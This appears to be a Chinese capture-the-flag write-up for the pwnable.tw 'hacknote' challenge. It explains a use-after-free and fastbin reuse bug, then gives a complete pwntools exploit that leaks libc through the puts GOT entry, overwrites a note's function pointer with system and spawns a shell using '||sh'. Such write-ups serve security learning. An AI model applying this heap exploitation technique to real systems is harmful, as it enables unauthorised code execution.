pwnable.tw hacknote

hacknote

主要考察:uaf,fastbin数据结构

分析程序流程可知,在add部分,创建的数据结构如下所示
pwnable.tw hacknote_第1张图片用图片直观表示,就是
pwnable.tw hacknote_第2张图片

所有被分配的chunk数据结构都是puts块+数据块,并且puts块大小固定。注意到每次free的时候两个快都会被free,并且存在uaf,考虑在free两个块之后,一次malloc 0x8大小的内容,再执行show,那么malloc(0x8)时候调用的puts函数即可被劫持,因为0x10大小的块全被放在了一个fastbin中,我们add一个0x8的块,会从fastbin中取出两个0x8的块,并且可以控制其中一个的内容。将其中的指针部分(上图中的pointer)换掉可以泄露内容;将my_puts换掉可以执行特定函数。这里复习一下fastbin是单向链表,头插法并且从头取出,先进后出。
需要注意的是:不能使用/bin/sh作为system参数。这里只有四字节,需要使用”||sh",在shell语言中

from pwn import *
from LibcSearcher import *
io = process('./hacknote')
context.log_level = 'debug'
# libc = ELF('./libc_32.so.6')
io = remote('node4.buuoj.cn',28472)
elf=ELF('./hacknote')

def add(size,content):
    io.recvuntil('Your choice :')
    io.sendline(str(1))
    io.recvuntil('Note size :')
    io.sendline(str(size))
    io.recvuntil('Content :')
    io.sendline(str(content))
    io.recvline()

def show(id):
    io.recvuntil('Your choice :')
    io.sendline(str(3))
    io.recvuntil('Index :')
    io.sendline(str(id))

def delete(id):
    io.recvuntil('Your choice :')
    io.sendline(str(2))
    io.recvuntil('Index :')
    io.sendline(str(id))
    io.recvline()



puts_got = elf.got['puts']

add(0x20,'aaaa') #0
add(0x20,'bbbb') #1
delete(0)
delete(1)
add(0x8,p32(0x0804862B)+p32(puts_got)) #2
show(0)
puts_plt = u32(io.recvuntil('\xf7'))
libc = LibcSearcher('puts',puts_plt)
libc_base = puts_plt - libc.dump('puts')
print "libc_base----->" + hex(libc_base)

system = libc.dump('system') + libc_base
delete(2)
add(0x8,p32(system)+'||sh')
# gdb.attach(io,"b *0x080488A5")
show(0)


io.interactive()




你可能感兴趣的:(pwnable.tw,pwn)